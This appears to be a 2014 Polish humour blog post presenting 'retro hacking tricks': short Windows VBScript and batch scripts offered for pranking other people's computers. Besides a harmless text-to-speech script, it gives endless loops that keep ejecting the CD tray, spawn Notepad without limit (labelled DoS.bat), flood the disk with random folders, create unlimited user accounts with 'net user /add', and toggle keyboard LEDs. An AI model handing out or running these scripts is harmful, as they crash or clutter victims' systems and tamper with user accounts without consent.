Tricki przeszłości, aka ’90s

Posted: 15 July 2014 in Humour
Tags: , , , ,

To dopiero retro tricki. Hackowanie pełną parą. Żadna w barze się nie oparła, gdy napęd CD sam się otwierał, a klawiatura blinkała jak szalona. Fuck the system :-J.

Mówiący plik
Voice.vbs:
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Wysuwany napęd
CD.vbs:
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
Notepad Killer
DoS.bat:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Folder flo0der
Folder.bat:
@echo off
:x
md %random% // makes directory/folder.
goto x
Account flo0der
UA.bat:
@echo off
:x
net user %random% /add //create user account
goto x
LED blinking
led.vbs:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s